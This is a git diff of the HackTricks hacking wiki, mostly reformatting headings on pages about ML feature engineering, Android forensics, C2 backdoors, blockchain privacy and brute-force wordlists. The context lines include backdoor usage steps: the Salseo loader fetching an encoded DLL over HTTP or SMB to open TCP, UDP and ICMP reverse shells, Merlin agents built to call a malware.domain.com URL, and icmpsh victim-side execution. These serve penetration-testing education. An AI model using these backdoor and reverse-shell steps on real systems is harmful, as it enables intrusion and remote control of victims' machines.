--- a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ML Basics
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
index 8e2b27f2..bd2cf080 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
@@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Feature Engineering
-
-## Basic types of possible data
+# Basic types of possible data
Data can be **continuous** (**infinity** values) or **categorical** (nominal) where the amount of possible values are **limited**.
-### Categorical types
+## Categorical types
-#### Binary
+### Binary
Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with:
@@ -33,7 +31,7 @@ Just **2 possible values**: 1 or 0. In case in a dataset the values are in strin
dataset["column2"] = dataset.column2.map({"T": 1, "F": 0})
```
-#### **Ordinal**
+### **Ordinal**
The **values follows an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case.
@@ -52,7 +50,7 @@ possible_values_mapping = {value:idx for idx,value in enumerate(possible_values_
dataset['column2'] = dataset.column2.map(possible_values_mapping)
```
-#### **Cyclical**
+### **Cyclical**
Looks **like ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting. Example: The days of the week, Sunday isn't "bigger" than Monday.
@@ -63,7 +61,7 @@ column2_dummies = pd.get_dummies(dataset.column2, drop_first=True)
dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1)
```
-#### **Dates**
+### **Dates**
Date are **continuous** **variables**. Can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one).
@@ -91,13 +89,13 @@ df_filled = daily_sum.reindex(idx, fill_value=0) # Fill missing values
# Get day of the week, Monday=0, Sunday=6, and week days names
dataset['DoW'] = dataset.transaction_date.dt.dayofweek
-## do the same in a different way
+# do the same in a different way
dataset['weekday'] = dataset.transaction_date.dt.weekday
# get day names
dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name())
```
-#### Multi-category/nominal
+### Multi-category/nominal
**More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature.
@@ -110,7 +108,7 @@ You can get a **multi-category column one-hot encoded** with `pd.get_dummies(dat
You can get a **multi-category column dummie encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes in binary features, so this will create **one new column per possible class minus one** as the **last 2 columns will be reflect as "1" or "0" in the last binary column created**. This will avoid perfect multicollinearity, reducing the relations between columns.
-## Collinear/Multicollinearity
+# Collinear/Multicollinearity
Collinear appears when **2 features are related to each other**. Multicollineratity appears when those are more than 2.
@@ -128,7 +126,7 @@ X = add_constant(onehot_encoded) # Add previously one-hot encoded data
print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns))
```
-## Categorical Imbalance
+# Categorical Imbalance
This occurs when there is **not the same amount of each category** in the training data.
@@ -177,7 +175,7 @@ You can use the argument **`sampling_strategy`** to indicate the **percentage**
Undersamplig or Oversampling aren't perfect if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data.
{% endhint %}
-### SMOTE oversampling
+## SMOTE oversampling
**SMOTE** is usually a **more trustable way to oversample the data**.
@@ -192,13 +190,13 @@ dataset['target_column'] = y_smote
print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore
```
-## Rarely Occurring Categories
+# Rarely Occurring Categories
Imagine a dataset where one of the target classes **occur very little times**.
This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could be also used here, but generally those techniques **won't give really good results**.
-### Weights
+## Weights
In some algorithms it's possible to **modify the weights of the targeted data** so some of them get by default more importance when generating the model.
@@ -209,13 +207,13 @@ model = LogisticRegression(class_weight=weights)
You can **mix the weights with over/under-sampling techniques** to try to improve the results.
-### PCA - Principal Component Analysis
+## PCA - Principal Component Analysis
Is a method that helps to reduce the dimensionality of the data. It's going to **combine different features** to **reduce the amount** of them generating **more useful features** (_less computation is needed_).
The resulting features aren't understandable by humans, so it also **anonymize the data**.
-## Incongruent Label Categories
+# Incongruent Label Categories
Data might have mistakes for unsuccessful transformations or just because human error when writing the data.
@@ -225,7 +223,7 @@ You can clean this issues by lowercasing everything and mapping misspelled label
It's very important to check that **all the data that you have contains is correctly labeled**, because for example, one misspelling error in the data, when dummie encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created.
-## Missing Data
+# Missing Data
Some data of the study may be missing.
@@ -293,7 +291,7 @@ dataset.iloc[10:20] # Get some indexes that contained empty data before
To fill categorical data first of all you need to think if there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe yo can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended).
-## Combining Features
+# Combining Features
If you find **two features** that are **correlated** between them, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**.
diff --git a/about-the-author.md b/about-the-author.md
index 72f5479f..55456eb1 100644
--- a/about-the-author.md
+++ b/about-the-author.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# About the author
-
-### Hello!!
+## Hello!!
This is **Carlos Polop**.
@@ -27,7 +25,7 @@ First of all, I want to indicate that **I don't own this entire book**, a lot of
I also wants to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that then I add to Hacktricks.
-### BIO
+## BIO
* I've worked in different companies as sysadmin, developer and **pentester**
* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity**
@@ -37,7 +35,7 @@ I also wants to say **thanks to all the people that share cyber-security related
* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng)
* And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**
-### Support HackTricks
+## Support HackTricks
Thank you for be **reading this**!
diff --git a/android-forensics.md b/android-forensics.md
index 65db55d2..2cfab072 100644
--- a/android-forensics.md
+++ b/android-forensics.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Android Forensics
-
-## Locked Device
+# Locked Device
To start extracting data from an Android device it has to be unlocked. If it's locked you can:
@@ -27,17 +25,17 @@ To start extracting data from an Android device it has to be unlocked. If it's l
* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
-## Data Adquisition
+# Data Adquisition
Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
-### If root access or physical connection to JTAG interface
+## If root access or physical connection to JTAG interface
* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
* `df /data` (Discover the block size of the system).
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
-### Memory
+## Memory
Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.
diff --git a/backdoors/empire.md b/backdoors/empire.md
index 47ab30bf..eb7ae3e4 100644
--- a/backdoors/empire.md
+++ b/backdoors/empire.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Empire
-
diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md
index ab9fb510..a07719b3 100644
--- a/backdoors/icmpsh.md
+++ b/backdoors/icmpsh.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ICMPsh
-
Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
-## Client side
+# Client side
Execute the script: **run.sh**
@@ -39,7 +37,7 @@ echo Please insert the IP where you want to listen
read IP
```
-## **Victim Side**
+# **Victim Side**
Upload **icmpsh.exe** to the victim and execute:
diff --git a/backdoors/merlin.md b/backdoors/merlin.md
index d4cd7163..eab15a69 100644
--- a/backdoors/merlin.md
+++ b/backdoors/merlin.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Merlin
+# Installation
-## Installation
-
-### Install GO
+## Install GO
```
#Download GO package from: https://golang.org/dl/
@@ -36,24 +34,24 @@ Add "export GOBIN=$GOPATH/bin"
source /etc/profile
```
-### Install Merlin
+## Install Merlin
```
go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/
```
-## Launch Merlin Server
+# Launch Merlin Server
```
go run cmd/merlinserver/main.go -i
```
-## Merlin Agents
+# Merlin Agents
You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)
-### Compile Agents
+## Compile Agents
Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_
@@ -64,13 +62,13 @@ make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)
```
-### **Manual compile agents**
+## **Manual compile agents**
```
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g
```
-## Modules
+# Modules
**The bad news is that every module used by Merlin is downloaded from the source (github) and saved indisk before using it. Forge about usingwell known modules because Windows Defender will catch you!**\
@@ -103,7 +101,7 @@ GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -
**Didn't check persistence modules**
-## Resume
+# Resume
I really like the feeling and the potential of the tool.\
I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
index af729cef..9f7c928c 100644
--- a/backdoors/salseo.md
+++ b/backdoors/salseo.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Salseo
-
-## Compiling the binaries
+# Compiling the binaries
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
@@ -35,18 +33,18 @@ Then, build both projects (Build -> Build Solution) (Inside the logs will appear
.png>)
-## Prepare the Backdoor
+# Prepare the Backdoor
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
-### **Python**
+## **Python**
```
python EncrypterAssembly/encrypterassembly.py
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
-### Windows
+## Windows
```
EncrypterAssembly.exe
@@ -57,9 +55,9 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
-## **Execute the backdoor**
+# **Execute the backdoor**
-### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
+## **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.
@@ -67,7 +65,7 @@ Remember to start a nc as the reverse shell listener, and a HTTP server to serve
SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp
```
-### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
+## **Getting a UDP reverse shell (downloading encoded dll through SMB)**
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
@@ -75,11 +73,11 @@ Remember to start a nc as the reverse shell listener, and a SMB server to serve
SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp
```
-### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
+## **Getting a ICMP reverse shell (encoded dll already inside the victim)**
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
-#### **Disable ICMP Replies:**
+### **Disable ICMP Replies:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
@@ -88,45 +86,45 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
-#### Execute the client:
+### Execute the client:
```
python icmpsh_m.py "" ""
```
-#### Inside the victim, lets execute the salseo thing:
+### Inside the victim, lets execute the salseo thing:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp
```
-## Compiling SalseoLoader as DLL exporting main function
+# Compiling SalseoLoader as DLL exporting main function
Open the SalseoLoader project using Visual Studio.
-### Add before the main function: \[DllExport]
+## Add before the main function: \[DllExport]
.png>)
-### Install DllExport for this project
+## Install DllExport for this project
-#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
+### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
.png>)
-#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
+### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
.png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
-### **U**ninstall DllExport
+## **U**ninstall DllExport
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
.png>)
-### **Exit Visual Studio and execute DllExport\_configure**
+## **Exit Visual Studio and execute DllExport\_configure**
Just **exit** Visual Studio
@@ -136,13 +134,13 @@ Select **x64** (if you are going to use it inside a x64 box, that was my case),
.png>)
-### **Open the project again with visual Studio**
+## **Open the project again with visual Studio**
**\[DllExport]** should not be longer marked as error
.png>)
-### Build the solution
+## Build the solution
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
@@ -154,7 +152,7 @@ Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> P
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
-### Test the generated Dll
+## Test the generated Dll
Copy and paste the Dll where you want to test it.
@@ -166,11 +164,11 @@ rundll32.exe SalseoLoader.dll,main
If not error appears, probably you have a functional dll!!
-## Get a shell using the Dll
+# Get a shell using the Dll
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
-### Powershell
+## Powershell
```
$env:pass="password"
@@ -181,7 +179,7 @@ $env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
-### CMD
+## CMD
```
set pass=password
diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md
index 59a7fa4d..dde55354 100644
--- a/blockchain/blockchain-and-crypto-currencies/README.md
+++ b/blockchain/blockchain-and-crypto-currencies/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Blockchain & Crypto Currencies
-
-## Basic Terminology
+# Basic Terminology
* **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediary’s involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)).
* Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored inmutable) and can be read by the people before accepting them.
@@ -31,26 +29,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **DEX: Decentralized Exchange Platforms**.
* **DAOs**: **Decentralized Autonomous Organizations**.
-## Consensus Mechanisms
+# Consensus Mechanisms
For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**.
Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.
-### Proof Of Work (PoW)
+## Proof Of Work (PoW)
This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.\
The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more probably to **finish** **earlier** the Proof of Work and get the fees of all the transactions.
-### Proof Of Stake (PoS)
+## Proof Of Stake (PoS)
PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\
In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block.\
Compared with PoW, this greatly **reduced the energy consumption** the miners are expending.
-## Bitcoin
+# Bitcoin
-### Transactions
+## Transactions
A simple **transaction** is a **movement of money** from an address to another one.\
An **address** in bitcoin is the hash of the **public** **key**, therefore, someone in order to make a transaction from an address he needs to know the private key associated to that public key (the address).\
@@ -79,11 +77,11 @@ Once R and S have been calculated, they are serialized into a byte stream that i
Verification of a signature effectively means that only the owner of the private key (that generated the public key) could have produced the signature on the transaction. The signature verification algorithm will return ‘TRUE’ if the signature is indeed valid.
-#### Multisignature Transactions
+### Multisignature Transactions
A multi-signature **address** is an address that is associated with more than one ECDSA private key. The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address.
-#### Transactions Fields
+### Transactions Fields
Each bitcoin transaction has several fields:
@@ -98,7 +96,7 @@ There are **2 main types** of transactions:
* **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security.
* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one.
-### Lightning Network
+## Lightning Network
This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\
This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain:
@@ -109,27 +107,27 @@ Normal use of the Lightning Network consists of **opening a payment channel** by
Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time.
-## Bitcoin Privacy Attacks
+# Bitcoin Privacy Attacks
-### Common Input
+## Common Input
Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belongs to the same owner**.
-### UTXO Change Address Detection
+## UTXO Change Address Detection
**UTXO** means **Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved.
Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**.
-### Social Networks & Forums
+## Social Networks & Forums
Some people gives data about theirs bitcoin addresses in different webs on Internet. **This make pretty easy to identify the owner of an address**.
-### Transaction Graphs
+## Transaction Graphs
By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain.
-### **Unnecessary input heuristic**
+## **Unnecessary input heuristic**
Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC.
@@ -148,7 +146,7 @@ This is an issue for transactions which have more than one input. One way to fix
5 btc
```
-### Forced address reuse
+## Forced address reuse
**Forced address reuse** or **incentivized address reuse** is when an adversary pays an (often small) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse.
@@ -156,14 +154,14 @@ This attack is sometimes incorrectly called a **dust attack**.
The correct behaviour by wallets is to not spend coins that have landed on an already-used empty addresses.
-### Other Blockchain Analysis
+## Other Blockchain Analysis
* **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**.
* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover.
* **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint.
* **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**.
-### Traffic analysis
+## Traffic analysis
Some organisation **sniffing your traffic** can see you communicating in the bitcoin network.\
If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**.
@@ -171,27 +169,27 @@ If the adversary sees a transaction or block **coming out of your node which did
An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the s**o**urces could be able to know the IP address that are announcing transactions or blocks.\
Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined.
-### Other attacks to find info about the owner of addresses
+## Other attacks to find info about the owner of addresses
For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
-## Anonymous Bitcoins
+# Anonymous Bitcoins
-### Obtaining Bitcoins Anonymously
+## Obtaining Bitcoins Anonymously
* **Cash trades:** Buy bitcoin using cash.
* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online.
* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address.
* **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them.
-### Mixers
+## Mixers
A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions.
However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent.\
Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later.
-### CoinJoin
+## CoinJoin
**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\
This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
@@ -201,7 +199,7 @@ Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
**Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given from miners, so it jus appear in your waller).**
-### PayJoin
+## PayJoin
The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value.
@@ -216,42 +214,42 @@ It could be interpreted as a simple transaction paying to somewhere with leftove
If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic be completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea.
-## Bitcoin Privacy Good Practices
+# Bitcoin Privacy Good Practices
-### Wallet Synchronization
+## Wallet Synchronization
Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good).
* **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in.
* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance.
-### Tor
+## Tor
Bitcoin network uses a peer-to-peer network, which means that other peers can learn your IP address. This is why it's recommend to **connect through Tor every time you want to interact with the bitcoin network**.
-### Avoiding address reuse
+## Avoiding address reuse
**Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse.
-### Multiple transactions
+## Multiple transactions
**Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC.
-### Change avoidance
+## Change avoidance
Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is excellent for privacy**, as it breaks change detection heuristics.
-### Multiple change outputs
+## Multiple change outputs
If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable.
-## Monero
+# Monero
When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void.
-## Ethereum
+# Ethereum
-### Gas
+## Gas
Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas refers to the **fee** required to successfully conduct a **transaction** on Ethereum.
@@ -269,7 +267,7 @@ Additionally, Jordan can also set a max fee (`maxFeePerGas`) for the transaction
As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed.
-### Transactions
+## Transactions
Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**.\
**Smart Contracts** are stored in the distributed ledger via a **special** **transaction**.
@@ -289,7 +287,7 @@ A submitted transaction includes the following information:
Note that there isn't any field for the origin address, this is because this can be extrapolated from the signature.
-## References
+# References
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
diff --git a/blockchain/blockchain-and-crypto-currencies/page-1.md b/blockchain/blockchain-and-crypto-currencies/page-1.md
index 1942df3a..eb7ae3e4 100644
--- a/blockchain/blockchain-and-crypto-currencies/page-1.md
+++ b/blockchain/blockchain-and-crypto-currencies/page-1.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Page 1
-
diff --git a/brute-force.md b/brute-force.md
index 3c699d36..652acf10 100644
--- a/brute-force.md
+++ b/brute-force.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Brute Force - CheatSheet
-
{% hint style="warning" %}
**Support HackTricks and get benefits!**
@@ -34,7 +32,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
-## Default Credentials
+# Default Credentials
**Search in google** for default credentials of the technology that is being used, or **try this links**:
@@ -50,11 +48,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
-## **Create your own Dictionaries**
+# **Create your own Dictionaries**
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
-### Crunch
+## Crunch
```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
@@ -67,13 +65,13 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
crunch 6 8 -t ,@@^^%%
```
-### Cewl
+## Cewl
```bash
cewl example.com -m 5 -w words.txt
```
-### [CUPP](https://github.com/Mebus/cupp)
+## [CUPP](https://github.com/Mebus/cupp)
Generate passwords based on your knowledge of the victim (names, dates...)
@@ -81,9 +79,9 @@ Generate passwords based on your knowledge of the victim (names, dates...)
python3 cupp.py -h
```
-### [pydictor](https://github.com/LandGrey/pydictor)
+## [pydictor](https://github.com/LandGrey/pydictor)
-### Wordlists
+## Wordlists
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
@@ -91,11 +89,11 @@ python3 cupp.py -h
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md)
